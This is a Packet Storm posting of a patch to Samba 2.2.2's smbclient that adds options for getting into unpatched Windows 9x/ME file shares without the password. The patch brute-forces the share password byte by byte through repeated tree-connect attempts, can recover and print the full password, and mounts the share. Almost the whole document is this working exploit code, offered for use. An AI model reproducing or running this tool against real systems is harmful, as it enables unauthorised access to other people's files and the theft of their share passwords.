Patch against samba 2.2.2 which allows mounting of unpatched win 9x+me machines without knowing the password. There is an option to retrieve the password very quickly too, and another to switch between the two password if both read only and read-write ones are presents.
abb2ee0f8ddd2bad2811f283572a75c9f79c45d05546be94f9919f5d6ec132aediff -r -C 2 samba-2.2.2/source/client/client.c samba-2.2.2-peche/source/client/client.c
*** samba-2.2.2/source/client/client.c Sat Oct 13 23:09:19 2001
--- samba-2.2.2-peche/source/client/client.c Wed Jan 9 21:46:24 2002
***************
*** 28,31 ****
--- 28,37 ----
#endif
+ /* XILUN HACK */
+ static BOOL breakin;
+ static BOOL get_full_pwd;
+ static BOOL reversed_scan;
+ /* XILUN HACK */
+
struct cli_state *cli;
extern BOOL in_client;
***************
*** 1969,1972 ****
--- 1975,1984 ----
struct cli_state *do_connect(char *server, char *share)
{
+ /* XILUN HACK */
+ unsigned char scanpass[10];
+ int way;
+ int first_char;
+ int last_char;
+ /* XILUN HACK */
struct cli_state *c;
struct nmb_name called, calling;
***************
*** 2072,2079 ****
if (!cli_send_tconX(c, sharename, "?????",
password, strlen(password)+1)) {
! DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
! cli_shutdown(c);
! free(c);
! return NULL;
}
--- 2084,2134 ----
if (!cli_send_tconX(c, sharename, "?????",
password, strlen(password)+1)) {
! /* XILUN HACK */
! if (!breakin) {
! DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
! cli_shutdown(c);
! free(c);
! return NULL;
! } else {
! BOOL found = False;
! c->sec_mode = 0; /**/
! if (reversed_scan) {
! way = -1; first_char = 0xFF; last_char = 0x20;
! } else {
! way = 1; first_char = 0x20; last_char = 0xFF;
! }
! if (get_full_pwd) {
! int deep;
! for (deep = 0; deep <= 8; deep++) scanpass[deep] = 0;
! for (deep = 0; deep <= 7; deep++) {
! scanpass[deep] = first_char - way;
! while (scanpass[deep] != last_char) {
! scanpass[deep]+=way;
! if (cli_send_tconX(c, sharename,
! "?????", scanpass, deep+1))
! { found = True; break; }
! }
! if (!found || cli_send_tconX(c, sharename,
! "?????", scanpass, deep+2))
! break;
! }
! } else {
! scanpass[0] = first_char - way;
! scanpass[1] = 0;
! while (scanpass[0] != last_char) {
! scanpass[0]+=way;
! if (cli_send_tconX(c, sharename,
! "?????", scanpass, 1))
! { found = True; break; }
! }
! }
! if (!found) {
! DEBUG(0,("Sorry you're dealing with a non broken smb server\n"));
! cli_shutdown(c);
! free(c);
! return NULL;
! } else DEBUG(0,("(Partial) password found : %s\n",scanpass));
! }
! /* XILUN HACK */
}
***************
*** 2138,2141 ****
--- 2193,2201 ----
DEBUG(0,("\t-c command string execute semicolon separated commands\n"));
DEBUG(0,("\t-b xmit/send buffer changes the transmit/send buffer (default: 65520)\n"));
+ /* XILUN HACK */
+ DEBUG(0,("\t-w connect to host walking around the password\n"));
+ DEBUG(0,("\t-f display the host full password and connect\n"));
+ DEBUG(0,("\t-r use reverse order to scan the password\n"));
+ /* XILUN HACK */
DEBUG(0,("\n"));
}
***************
*** 2421,2426 ****
while ((opt =
! getopt(argc, argv,"s:O:R:M:i:Nn:d:Pp:l:hI:EU:L:t:m:W:T:D:c:b:A:")) != EOF) {
switch (opt) {
case 's':
pstrcpy(servicesf, optarg);
--- 2481,2499 ----
while ((opt =
! getopt(argc, argv,"wfrs:O:R:M:i:Nn:d:Pp:l:hI:EU:L:t:m:W:T:D:c:b:A:")) != EOF) {
switch (opt) {
+ /* XILUN HACK */
+ case 'w':
+ breakin = True;
+ break;
+ case 'f':
+ breakin = True;
+ get_full_pwd = True;
+ break;
+ case 'r':
+ breakin = True;
+ reversed_scan = True;
+ break;
+ /* XILUN HACK */
case 's':
pstrcpy(servicesf, optarg);
diff -r -C 2 samba-2.2.2/source/libsmb/cliconnect.c samba-2.2.2-peche/source/libsmb/cliconnect.c
*** samba-2.2.2/source/libsmb/cliconnect.c Fri Jul 6 04:01:37 2001
--- samba-2.2.2-peche/source/libsmb/cliconnect.c Wed Jan 9 21:45:54 2002
***************
*** 256,260 ****
* Non-encrypted passwords - convert to DOS codepage before using.
*/
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT|STR_TERMINATE);
} else {
memcpy(pword, pass, passlen);
--- 256,263 ----
* Non-encrypted passwords - convert to DOS codepage before using.
*/
! if (pass[passlen-1] == 0)
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT|STR_TERMINATE);
! else
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT);
} else {
memcpy(pword, pass, passlen);
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed